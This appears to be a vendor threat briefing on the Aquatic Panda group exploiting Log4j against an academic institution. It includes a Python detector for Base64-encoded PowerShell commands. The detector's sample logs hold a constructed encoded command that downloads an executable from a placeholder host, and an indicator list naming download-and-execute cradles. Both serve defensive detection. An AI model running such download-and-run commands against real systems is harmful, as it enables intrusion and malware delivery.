EXECUTIVE SUMMARY:

Why are hackers targeting universities and colleges? Academic institutions are common targets because their systems are often vulnerable and their data is valuable.

As of July 2021, academic groups saw an average of 6,956 cyber attacks per month, a 29% increase over the prior year’s numbers.

Presently, the Aquatic Panda advanced persistent threat (APT) group is leveraging the Log4j vulnerabilities to access proprietary information owned by academic institutions.


What we know

The Aquatic Panda group first appeared online in 2012. According to researchers, Aquatic Panda operators aim to collect intelligence and to engage in espionage. The group’s specific objectives remain unknown.

Up until this point, Aquatic Panda has primarily targeted telecommunications groups, technology firms, and government entities. Operators rely extensively on Cobalt Strike. Previous tools used in operations also include Gh0st RAT, Poison Ivy, and Torn RAT.

Why it matters

Aquatic Panda is state-sponsored and uses techniques that let it persist in compromised environments. This sets the stage for continuous theft of valuable data. It also enables the threat actors to spend days, weeks or months mapping out vulnerabilities and planning a more lucrative and disruptive attack. Attack clean-up isn’t easy and can cost organizations millions of budget dollars.

Log4j details

Researchers recently observed suspicious activity stemming from a specific process on a vulnerable VMware Horizon instance. The network belonged to a large academic institution. The activities ultimately resulted in an active intrusion.

After tracking the APT actor’s operations and examining available telemetry, researchers disclosed that a modified version of the Log4j exploit was likely used during the operation.

Technical insights

Researchers report that Aquatic Panda members leveraged a public GitHub project starting on December 13th of this year to gain access to the vulnerable instance of VMware Horizon. The Aquatic Panda group continued reconnaissance from the host while using native OS binaries to explore existing privilege levels, system details and domain information.

As researchers continued to trace Aquatic Panda’s behaviors, they observed use of a Base64-encoded PowerShell command to retrieve malware from the actor’s toolkits. While the attack unfolded, experts provided regular updates to the victim organization. The target implemented its incident response protocol as quickly as possible. Patching the vulnerable application ultimately prevented further intruder activity.
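The Base64-encoded PowerShell command mentioned above is a detection opportunity for defenders: Windows process-creation telemetry records the full command line, and the encoded form can be unwrapped and inspected. The following is an added example (not code from the article or from the researchers) that scans constructed process command lines, decodes any `-EncodedCommand` payload (PowerShell accepts abbreviations such as `-e`, `-ec` and `-enc`), and flags decoded commands that contain download cradles; the log lines, URL and indicator list are assumptions made for the example.

```python
import base64
import re

# PowerShell accepts abbreviated switches, so match -e, -ec, -enc and -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Substrings that indicate a command fetching remote content. Their presence alone
# is not proof of malice, but combined with encoding they merit analyst review.
DOWNLOAD_INDICATORS = (
    "Invoke-WebRequest", "DownloadString", "DownloadFile",
    "Net.WebClient", "Start-BitsTransfer", "Invoke-Expression", "IEX",
)

def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str):
    """Decode an -EncodedCommand payload; None if it is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Return a finding for one process command line."""
    finding = {"cmdline": cmdline, "encoded": False, "decoded": None, "indicators": []}
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return finding
    finding["encoded"] = True
    decoded = decode_ps(m.group(1))
    finding["decoded"] = decoded
    if decoded:  # undecodable blobs are still reported, as they are unusual on their own
        finding["indicators"] = [i for i in DOWNLOAD_INDICATORS if i.lower() in decoded.lower()]
    return finding

def scan(lines):
    """Return findings for every line that carries an encoded PowerShell command."""
    return [f for f in (analyze(line) for line in lines) if f["encoded"]]

# Constructed sample process-creation command lines (not taken from the incident).
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -Command Get-Service",
    "powershell.exe -nop -w hidden -enc " + encode_ps(
        "Invoke-WebRequest -Uri http://staging.example.invalid/tool -OutFile C:\\Users\\Public\\t.exe"),
    "powershell.exe -EncodedCommand " + encode_ps("Get-Date"),
    "powershell.exe -ec AAAAAAAAAAAAAAAAAAAA",  # valid Base64 but not UTF-16LE text
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f["indicators"] or "no download indicator", "<-", f["decoded"])
```

Feed it the command-line field from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled) to apply the same check to real telemetry.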

In conclusion

Across the world, a series of threat actors are exploiting the Log4j vulnerabilities for criminal gain. At least a handful of experts expect to see continued threat actor use of Log4j until all organizations apply comprehensive mitigations.

For its part, Apache has just issued another security update for the Log4j logging library. As of Tuesday, the latest version of Log4j available for install on systems running Java 8 is 2.17.1. This represents the fifth vulnerability discovered since December 9th. Given all of the attention on this library, this may or may not be the final update pertaining to Log4j vulnerabilities.

To learn more about managing cyber risk in a changing world, please join us at the premiere cyber security event of the year – CPX 360 2022.